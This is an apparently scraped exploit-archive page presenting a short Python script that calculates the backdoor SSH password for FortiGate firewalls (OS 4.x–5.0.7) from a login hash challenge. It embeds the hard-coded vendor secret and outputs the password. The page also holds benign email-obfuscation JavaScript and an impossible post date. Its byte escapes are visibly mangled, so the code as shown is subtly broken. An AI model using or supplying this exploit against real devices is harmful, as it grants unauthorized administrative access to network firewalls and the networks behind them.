Fortigate Backdoor Password Calculator
Posted on 30 November -0001
<HTML><HEAD><TITLE>Fortigate Backdoor Password Calculator</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Title : Fortigate Backdoor Password calculator # Date : 24 March 2016 # Author : Rishabh Dangwal, original exploit by <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="7718071205160318054f4547443705021915180f5914181a59">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> # Author Homepage : www.theprohack.com # Author Email : <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="9dfcf9f0f4f3dde9f5f8edeff2f5fcfef6b3fef2f0">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> # Vendor Homepage : www.fortinet.com # Version : FortiGate OS Version 4.x - 5.0.7 import base64 import hashlib print "Enter hash challenge " ; chash = raw_input() pwdhash = hashlib.sha1() pwdhash.update('x00' * 12) pwdhash.update(chash + 'FGTAbc11*xy+Qqz27') pwdhash.update('xA3x88xBAx2Ex42x4CxB0x4Ax53x79x30xC1x31x07xCCx3FxA1x32x90x29xA9x81x5Bx70') fhash = 'AK1' + base64.b64encode('x00' * 12 + pwdhash.digest()) print "password is %s" %fhash </BODY></HTML>